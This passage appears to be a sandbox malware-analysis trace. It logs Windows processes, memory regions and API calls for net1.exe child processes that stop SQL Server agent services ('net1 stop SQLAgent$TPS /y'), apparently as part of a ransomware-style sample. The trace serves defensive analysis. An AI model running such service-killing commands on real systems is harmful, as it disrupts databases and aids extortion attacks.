"NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10459 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10460 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10461 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10462 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10463 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10464 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10465 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10466 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10467 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 10468 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10469 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10470 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10471 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 785 os_tid = 0x7ac Process: id = "289" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6c7c6000" os_pid = "0x11e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "283" os_parent_pid = "0x1140" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10472 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10473 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10474 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10475 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10476 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10477 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10478 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10479 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10480 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10481 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10482 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 10483 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10484 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 10485 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10486 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10499 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10500 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10501 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10502 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 10503 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 10504 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10505 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10506 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10507 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10508 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10509 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10510 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10511 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10512 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10513 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10514 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10515 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10516 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10517 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10518 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10519 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10520 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10521 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10525 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 787 os_tid = 0x111c [0112.301] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfdd0 | out: lpSystemTimeAsFileTime=0xcfdd0*(dwLowDateTime=0xf815aa70, dwHighDateTime=0x1d48689)) [0112.301] GetCurrentProcessId () returned 0x11e8 [0112.301] GetCurrentThreadId () returned 0x111c [0112.301] GetTickCount () returned 0x25c71 [0112.301] QueryPerformanceCounter (in: lpPerformanceCount=0xcfdd8 | out: lpPerformanceCount=0xcfdd8*=1815921900000) returned 1 [0112.303] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0112.303] __set_app_type (_Type=0x1) [0112.303] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0112.303] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0112.317] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.317] GetConsoleOutputCP () returned 0x1b5 [0112.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0112.317] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0112.319] sprintf_s (in: _DstBuf=0xcfd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0112.319] setlocale (category=0, locale=".437") returned="English_United States.437" [0112.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.321] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.321] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" [0112.321] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0112.321] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0112.321] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfd68 | out: Buffer=0xcfd68*=0x114d50) returned 0x0 [0112.321] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfd68 | out: Buffer=0xcfd68*=0x11c100) returned 0x0 [0112.321] _fileno (_File=0x7fefdba2a80) returned 0 [0112.321] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0112.321] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0112.321] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0112.321] _wcsicmp (_String1="config", _String2="stop") returned -16 [0112.322] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0112.322] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0112.322] _wcsicmp (_String1="file", _String2="stop") returned -13 [0112.322] _wcsicmp (_String1="files", _String2="stop") returned -13 [0112.322] _wcsicmp (_String1="group", _String2="stop") returned -12 [0112.322] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0112.322] _wcsicmp (_String1="help", _String2="stop") returned -11 [0112.322] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0112.322] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0112.322] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0112.322] _wcsicmp (_String1="session", _String2="stop") returned -15 [0112.322] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0112.322] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0112.322] _wcsicmp (_String1="share", _String2="stop") returned -12 [0112.322] _wcsicmp (_String1="start", _String2="stop") returned -14 [0112.322] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0112.322] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0112.322] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0112.322] _wcsicmp (_String1="accounts", _String2="SQLAgent$TPS") returned -18 [0112.322] _wcsicmp (_String1="computer", _String2="SQLAgent$TPS") returned -16 [0112.322] _wcsicmp (_String1="config", _String2="SQLAgent$TPS") returned -16 [0112.322] _wcsicmp (_String1="continue", _String2="SQLAgent$TPS") returned -16 [0112.322] _wcsicmp (_String1="cont", _String2="SQLAgent$TPS") returned -16 [0112.322] _wcsicmp (_String1="file", _String2="SQLAgent$TPS") returned -13 [0112.322] _wcsicmp (_String1="files", _String2="SQLAgent$TPS") returned -13 [0112.322] _wcsicmp (_String1="group", _String2="SQLAgent$TPS") returned -12 [0112.322] _wcsicmp (_String1="groups", _String2="SQLAgent$TPS") returned -12 [0112.322] _wcsicmp (_String1="help", _String2="SQLAgent$TPS") returned -11 [0112.322] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$TPS") returned -11 [0112.322] _wcsicmp (_String1="localgroup", _String2="SQLAgent$TPS") returned -7 [0112.322] _wcsicmp (_String1="pause", _String2="SQLAgent$TPS") returned -3 [0112.322] _wcsicmp (_String1="session", _String2="SQLAgent$TPS") returned -12 [0112.322] _wcsicmp (_String1="sessions", _String2="SQLAgent$TPS") returned -12 [0112.323] _wcsicmp (_String1="sess", _String2="SQLAgent$TPS") returned -12 [0112.323] _wcsicmp (_String1="share", _String2="SQLAgent$TPS") returned -9 [0112.323] _wcsicmp (_String1="start", _String2="SQLAgent$TPS") returned 3 [0112.323] _wcsicmp (_String1="stats", _String2="SQLAgent$TPS") returned 3 [0112.323] _wcsicmp (_String1="statistics", _String2="SQLAgent$TPS") returned 3 [0112.323] _wcsicmp (_String1="stop", _String2="SQLAgent$TPS") returned 3 [0112.323] _wcsicmp (_String1="time", _String2="SQLAgent$TPS") returned 1 [0112.323] _wcsicmp (_String1="user", _String2="SQLAgent$TPS") returned 2 [0112.323] _wcsicmp (_String1="users", _String2="SQLAgent$TPS") returned 2 [0112.323] _wcsicmp (_String1="msg", _String2="SQLAgent$TPS") returned -6 [0112.323] _wcsicmp (_String1="messenger", _String2="SQLAgent$TPS") returned -6 [0112.323] _wcsicmp (_String1="receiver", _String2="SQLAgent$TPS") returned -1 [0112.323] _wcsicmp (_String1="rcv", _String2="SQLAgent$TPS") returned -1 [0112.323] _wcsicmp (_String1="netpopup", _String2="SQLAgent$TPS") returned -5 [0112.323] _wcsicmp (_String1="redirector", _String2="SQLAgent$TPS") returned -1 [0112.323] _wcsicmp (_String1="redir", _String2="SQLAgent$TPS") returned -1 [0112.323] _wcsicmp (_String1="rdr", _String2="SQLAgent$TPS") returned -1 [0112.323] _wcsicmp (_String1="workstation", _String2="SQLAgent$TPS") returned 4 [0112.323] _wcsicmp (_String1="work", _String2="SQLAgent$TPS") returned 4 [0112.323] _wcsicmp (_String1="wksta", _String2="SQLAgent$TPS") returned 4 [0112.323] _wcsicmp (_String1="prdr", _String2="SQLAgent$TPS") returned -3 [0112.323] _wcsicmp (_String1="devrdr", _String2="SQLAgent$TPS") returned -15 [0112.323] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$TPS") returned -7 [0112.323] _wcsicmp (_String1="server", _String2="SQLAgent$TPS") returned -12 [0112.323] _wcsicmp (_String1="svr", _String2="SQLAgent$TPS") returned 5 [0112.323] _wcsicmp (_String1="srv", _String2="SQLAgent$TPS") returned 1 [0112.323] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$TPS") returned -7 [0112.323] _wcsicmp (_String1="alerter", _String2="SQLAgent$TPS") returned -18 [0112.323] _wcsicmp (_String1="netlogon", _String2="SQLAgent$TPS") returned -5 [0112.323] _wcsupr (in: _String="SQLAgent$TPS" | out: _String="SQLAGENT$TPS") returned="SQLAGENT$TPS" [0112.324] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x11ce10 [0112.328] GetServiceKeyNameW (in: hSCManager=0x11ce10, lpDisplayName="SQLAGENT$TPS", lpServiceName=0xff725750, lpcchBuffer=0xcfc88 | out: lpServiceName="", lpcchBuffer=0xcfc88) returned 0 [0112.329] _wcsicmp (_String1="msg", _String2="SQLAGENT$TPS") returned -6 [0112.329] _wcsicmp (_String1="messenger", _String2="SQLAGENT$TPS") returned -6 [0112.329] _wcsicmp (_String1="receiver", _String2="SQLAGENT$TPS") returned -1 [0112.329] _wcsicmp (_String1="rcv", _String2="SQLAGENT$TPS") returned -1 [0112.329] _wcsicmp (_String1="redirector", _String2="SQLAGENT$TPS") returned -1 [0112.329] _wcsicmp (_String1="redir", _String2="SQLAGENT$TPS") returned -1 [0112.329] _wcsicmp (_String1="rdr", _String2="SQLAGENT$TPS") returned -1 [0112.329] _wcsicmp (_String1="workstation", _String2="SQLAGENT$TPS") returned 4 [0112.329] _wcsicmp (_String1="work", _String2="SQLAGENT$TPS") returned 4 [0112.329] _wcsicmp (_String1="wksta", _String2="SQLAGENT$TPS") returned 4 [0112.329] _wcsicmp (_String1="prdr", _String2="SQLAGENT$TPS") returned -3 [0112.329] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$TPS") returned -15 [0112.329] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$TPS") returned -7 [0112.329] _wcsicmp (_String1="server", _String2="SQLAGENT$TPS") returned -12 [0112.329] _wcsicmp (_String1="svr", _String2="SQLAGENT$TPS") returned 5 [0112.329] _wcsicmp (_String1="srv", _String2="SQLAGENT$TPS") returned 1 [0112.329] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$TPS") returned -7 [0112.329] _wcsicmp (_String1="alerter", _String2="SQLAGENT$TPS") returned -18 [0112.329] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$TPS") returned -5 [0112.329] NetServiceControl (in: servername=0x0, service="SQLAGENT$TPS", opcode=0x0, arg=0x0, bufptr=0xcfc90 | out: bufptr=0xcfc90) returned 0x889 [0112.330] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0112.330] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0112.331] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0112.332] GetFileType (hFile=0xb) returned 0x2 [0112.332] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfb58 | out: lpMode=0xcfb58) returned 1 [0112.333] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfb50, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0xcfb50*=0x1e) returned 1 [0112.333] GetFileType (hFile=0xb) returned 0x2 [0112.333] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfb58 | out: lpMode=0xcfb58) returned 1 [0112.333] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfb50, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0xcfb50*=0x2) returned 1 [0112.333] _ultow (in: _Dest=0x889, _Radix=850880 | out: _Dest=0x889) returned="2185" [0112.333] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0112.334] GetFileType (hFile=0xb) returned 0x2 [0112.334] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfb58 | out: lpMode=0xcfb58) returned 1 [0112.334] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfb50, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0xcfb50*=0x34) returned 1 [0112.334] GetFileType (hFile=0xb) returned 0x2 [0112.334] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfb58 | out: lpMode=0xcfb58) returned 1 [0112.335] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfb50, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0xcfb50*=0x2) returned 1 [0112.335] NetApiBufferFree (Buffer=0x114d50) returned 0x0 [0112.335] NetApiBufferFree (Buffer=0x11c100) returned 0x0 [0112.335] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" [0112.335] exit (_Code=2) Process: id = "290" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x590e3000" os_pid = "0x1174" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "284" os_parent_pid = "0x1084" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10490 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10491 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10492 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10493 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10494 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10495 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10496 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10497 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10498 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10522 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10523 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10524 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10528 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10529 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 10530 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 10531 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10532 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10533 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10534 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10535 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10536 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = 